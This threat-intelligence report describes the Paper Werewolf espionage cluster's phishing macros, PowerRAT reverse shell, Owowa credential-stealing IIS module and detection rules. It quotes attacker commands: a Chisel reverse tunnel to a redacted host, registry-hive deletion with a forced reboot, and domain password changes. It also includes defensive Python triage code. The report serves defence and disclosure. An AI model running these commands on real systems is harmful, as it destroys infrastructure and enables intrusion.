Espionage cluster Paper Werewolf engages in destructive behavior
The BI.ZONE Threat Intelligence team has recorded a surge in the activity of the Paper Werewolf cluster (also known as GOFFEE), which has conducted at least seven campaigns since 2022. Among the victims are government, energy, financial, media, and other organizations.
The adversaries send out phishing emails with a Microsoft Word attachment containing a malicious macro. However, their latest activity goes beyond espionage purposes: we have detected a case where Paper Werewolf disrupted the operation of the compromised infrastructure.
- While primarily committed to cyber espionage, such clusters can ruin the operation of target infrastructures simply out of spite, once their primary goal is achieved.
- Apart from experimenting with post‑exploitation frameworks, the adversaries develop their own implants for such frameworks, which significantly impedes detection.
- The attackers opt for the PowerShell interpreter as a versatile tool that enables them to bypass corporate defenses.
Paper Werewolf uses Microsoft Word documents that contain a malicious macro. Such files are likely distributed via phishing emails.
It is noteworthy that the adversaries often use the open‑source Gophish framework, designed for enterprise phishing‑awareness testing, to organize their mailings.
Example of a phishing email sent by the attackers
Link pointing to the use of Gophish
The distributed files are masked as documents from various organizations (a research institution, a municipal administration, a power grid company, etc.).
As the malicious file is encrypted, the victim is prompted to allow macros.
Encrypted content of a malicious document
Once the victim allows macros, the document content is decrypted.
Decrypted content of a malicious document
The document is decrypted by replacing special characters with respective Russian letters.
Document decryption
The search for the payload within the document starts after the DigitalRSASignature key string. The payload is Base64‑encoded and consists of two parts separated by a CHECKSUM string.
Encrypted payload
The macro decrypts the payload and writes it into two files:
- %USERPROFILE%\UserCache.ini (PowerShell script)
- %USERPROFILE%\UserCache.ini.hta (HTA)
To gain persistence in the compromised system, the path to UserCache.ini.hta is written into the following registry parameter:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
To conceal the malicious programs in the compromised system, the threat actor uses environment variables:
- AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted]
- ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted]
- VB=VBScript
- AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
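The staging pattern above (two environment variables carrying halves of a Base64 string and a third holding the expression that joins and decodes them) can be recognized and reassembled for triage from a process environment dump. The following is an added example and not code from the report; the variable values are constructed stand‑ins, since the real chunks are redacted.

```python
import base64
import re

# Constructed sample environment (not the report's redacted values): a harmless
# UTF-16LE script stands in for the payload, base64-encoded and split in two
# chunks exactly as the post describes, plus the decoder expression itself.
_STAND_IN = base64.b64encode("Write-Host 'staged payload stand-in'".encode("utf-16-le")).decode()
SAMPLE_ENV = {
    "AZURE_RESOURCE_GROUP": _STAND_IN[:30],
    "ONEDRIVE_RESOURCE_GROUP": _STAND_IN[30:],
    "VB": "VBScript",
    "AZURE_DECODE": "[System.Text.Encoding]::Unicode.GetString([System.Convert]::"
                    "FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))",
}

# FromBase64String(...) whose argument consists only of $env: references joined with '+'
DECODE_RE = re.compile(r"FromBase64String\(((?:\$env:\w+\s*\+?\s*)+)\)", re.IGNORECASE)


def find_staged_decoder(env):
    """Return (decoder variable, [chunk variables in concatenation order]) for the
    first variable whose value base64-decodes other environment variables, else None."""
    for name, value in env.items():
        m = DECODE_RE.search(value)
        if m:
            return name, re.findall(r"\$env:(\w+)", m.group(1))
    return None


def reassemble_payload(env):
    """Rebuild the staged script for triage: concatenate the chunks in the order the
    decoder names them and decode as UTF-16LE, which is what [Text.Encoding]::Unicode means."""
    found = find_staged_decoder(env)
    if found is None:
        return None
    _, chunks = found
    blob = "".join(env.get(c, "") for c in chunks)
    return base64.b64decode(blob).decode("utf-16-le")
```

Chunk order matters: the decoder expression, not the variable names, tells you which half comes first.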
In one of the cases, the malicious document contained a link to a 1×1 pixel image. Using this trick, the attackers can monitor whether the victim has opened the malicious document.
The HTA file creates and runs a file %USERPROFILE%\UserCacheHelper.lnk.js to execute the PowerShell script %USERPROFILE%\UserCache.ini.
The decrypted content of UserCache.ini is a reverse shell being a PowerShell script known as PowerRAT, which:
- sets the Hidden attribute on the UserCache.ini and UserCache.ini.hta files
- polls the server hxxp://[redacted]:80/api/texts/<victim_id> for commands, where victim_id is [computer name]_[username]_[serial number of the system disk]. The commands are XML with the following attributes:
  - CountRuns, a counter of how many times the command has been run
  - Interval, the interval between command runs in minutes
  - Module, the Base64‑encoded command (a PowerShell script)
- runs the command received from the server through Invoke‑Expression
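The check‑in path and command format described above give defenders two hooks: the three‑part victim identifier in the URL can be matched in proxy logs, and a captured command can be decoded for triage. The following is an added example, not code from the report; the log lines and the XML element layout are constructed assumptions (the report names only the attributes CountRuns, Interval and Module, and does not state the text encoding of Module).

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed proxy log lines in a generic "time client method url status" layout
# (not from the report). 203.0.113.10 is a documentation address standing in for the C2.
SAMPLE_PROXY_LOG = [
    "2024-05-01T10:00:00Z 10.0.0.5 GET http://203.0.113.10:80/api/texts/WS-ACCT01_jdoe_9C3F1A2B 200",
    "2024-05-01T10:00:01Z 10.0.0.5 GET http://intranet.example/api/texts/release-notes 200",
    "2024-05-01T10:05:00Z 10.0.0.7 GET http://203.0.113.10/api/texts/SRV-FILE02_svc_backup_11AA22BB 200",
]
URL_RE = re.compile(r"/api/texts/([^\s?]+)")


def find_beacons(lines):
    """Return one record per line whose URL matches the PowerRAT check-in path
    /api/texts/<computer name>_<username>_<disk serial>. The username may itself
    contain underscores, so the host is the first field and the serial the last."""
    hits = []
    for line in lines:
        m = URL_RE.search(line)
        if not m:
            continue
        parts = m.group(1).split("_")
        if len(parts) < 3:
            continue  # /api/texts/ alone is not enough; require the 3-part victim id
        hits.append({"line": line, "host": parts[0],
                     "user": "_".join(parts[1:-1]), "serial": parts[-1]})
    return hits


def decode_module(b64):
    """Base64-decode a Module value. Encoding is not stated in the report, so UTF-16LE is
    assumed when every odd byte is zero (ASCII text in UTF-16LE), UTF-8 otherwise."""
    raw = base64.b64decode(b64)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def parse_command(xml_text):
    """Parse a command carrying the CountRuns, Interval and Module attributes the report
    lists. The element name and attribute layout are assumptions for this example."""
    node = ET.fromstring(xml_text)
    return {"count_runs": int(node.attrib["CountRuns"]),
            "interval_minutes": int(node.attrib["Interval"]),
            "script": decode_module(node.attrib["Module"])}


# Constructed command with a harmless stand-in script, UTF-16LE like PowerShell -EncodedCommand.
SAMPLE_COMMAND = '<Command CountRuns="1" Interval="30" Module="{}"/>'.format(
    base64.b64encode("Get-Process | Out-String".encode("utf-16-le")).decode())
```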
In other attacks, the adversaries use their own loader mimicking explorer.exe. The malicious program loads and opens a decoy document. The decoy is written into the %TEMP% directory. Then the loader sends an HTTP POST request to the server to advance to the next stage. As of the date of this article, the next stage was not available for research, but we suppose that it involves a Mythic framework agent developed by the adversaries, known as PowerTaskel and QwakMyAgent. The function names in the loader are hashed with the Fowler–Noll–Vo algorithm.
Curiously enough, the attackers use this implant along with another framework agent, Poseidon.
The threat actor’s arsenal also includes Owowa, a malicious IIS module that lets them capture credentials as users authenticate to the Outlook Web Access (OWA) service. The captured data is kept in memory in a HashSet.
Example of data intercepted by Owowa
One of the Owowa modules returns the captured dataset, Base64‑encoded, when the request header contains the username ZaDS0tojX0VDh82, and clears the captured dataset and returns an Ok string (RSA‑encrypted) when the request header contains the username oACgTsBMliysfk.
To create a redundant access channel to the compromised IT infrastructure, the attackers resort to Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socks
They probably use PsExec to run commands on remote systems, in particular to perform destructive actions:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f && reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'
To hinder the staff’s interaction with the compromised IT infrastructure, the criminals change account passwords:
net user [redacted] [redacted] /domain
In the cases above, the attackers use a PowerShell script to run commands.
You can find more indicators of compromise related to the Paper Werewolf activity on the BI.ZONE Threat Intelligence portal.
| Tactic | Technique | Procedure |
|---|---|---|
| Resource Development | Acquire Infrastructure: Domains | Paper Werewolf registers C2 server and malware domains |
| Resource Development | Acquire Infrastructure: Virtual Private Server | Paper Werewolf uses VPS to host C2 servers and malware |
| Resource Development | Develop Capabilities: Malware | Paper Werewolf uses own crafted malware such as PowerTaskel |
| Resource Development | Obtain Capabilities: Tool | Paper Werewolf uses tools such as Chisel and PsExec, and the Mythic post‑exploitation framework |
| Resource Development | Stage Capabilities: Upload Malware | Paper Werewolf stores the payload on its servers |
| Initial Access | Phishing | Paper Werewolf sends out phishing emails to distribute documents with a malicious macro |
| Execution | Command and Scripting Interpreter: PowerShell | Paper Werewolf uses PowerShell tools such as PowerRAT and PowerTaskel to run C2 commands on the compromised host |
| Execution | Command and Scripting Interpreter: Visual Basic | Paper Werewolf creates a VBA macro in documents and an HTA file that creates and executes a VBScript |
| Execution | User Execution: Malicious File | Paper Werewolf targets its victims through malicious decoy documents from various companies and government agencies |
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Paper Werewolf gains persistence in the compromised system by using a registry parameter |
| Persistence | Server Software Component: IIS Components | Paper Werewolf installs a malicious Owowa module on the IIS server |
| Defense Evasion | Deobfuscate/Decode Files or Information | Paper Werewolf decrypts the payload in malicious documents using a VBA macro. Paper Werewolf decrypts and runs the malicious content of the environment variables in the compromised system |
| Defense Evasion | Hide Artifacts: Hidden Files and Directories | Paper Werewolf uses PowerRAT, which sets the Hidden attribute on its files |
| Defense Evasion | Obfuscated Files or Information: Dynamic API Resolution | Paper Werewolf applies the Fowler–Noll–Vo algorithm to hash the names of WinAPI functions used in the malicious loader |
| Defense Evasion | Obfuscated Files or Information: Embedded Payloads | Paper Werewolf uses malicious documents to store the Base64‑encoded payload |
| Defense Evasion | Obfuscated Files or Information: Fileless Storage | Paper Werewolf uses environment variables to store the malicious programs |
| Defense Evasion | Obfuscated Files or Information: Encrypted/Encoded File | Paper Werewolf uses Base64‑encoded payloads and PowerRAT commands |
| Credential Access | Input Capture: Web Portal Capture | Paper Werewolf retrieves credentials during user authorization in the OWA service by using the malicious IIS Owowa module |
| Discovery | System Information Discovery | Paper Werewolf uses PowerRAT to retrieve the name of the compromised host and the serial number of the system disk |
| Discovery | System Owner/User Discovery | Paper Werewolf uses PowerRAT to retrieve the compromised host username |
| Lateral Movement | Lateral Tool Transfer | Paper Werewolf uses PsExec to advance in the compromised IT infrastructure |
| Command and Control | Application Layer Protocol: Web Protocols | Paper Werewolf uses HTTP to communicate with the C2 servers and receive the payload |
| Command and Control | Encrypted Channel: Asymmetric Cryptography | Paper Werewolf uses the RSA algorithm to decrypt credentials intercepted by the malicious IIS Owowa module |
| Command and Control | Fallback Channels | Paper Werewolf uses Chisel as a redundant access channel to the compromised IT infrastructure |
| Command and Control | Ingress Tool Transfer | Paper Werewolf uses own loaders to deliver and launch the malware |
| Impact | Data Destruction | Paper Werewolf uses the commands reg delete HKEY_LOCAL_MACHINE\SYSTEM /f and reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f |
| Impact | System Shutdown/Reboot | Paper Werewolf uses the command shutdown /r /f /t 5 |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
- win_enable_macros_in_ms_office_document
- win_spawning_untipical_process_by_ms_office_app
- win_hta_file_was_created_by_ms_office_app
- win_unusual_mshta_parent_process
- win_persistence_via_load_regkey_was_detected
- win_set_hidden_file_attribute_for_executable_or_script
- win_suspicious_powershell_execution_code_from_file
- gen_chisel_usage_detected
- win_using_psexec_to_execute_process_on_remote_host
To stay ahead of threat actors, you need to understand their methods and tools and take this information into account when assessing the threat landscape of your organization. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. It provides information about the current attacks, threat actors, their tactics, techniques, and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.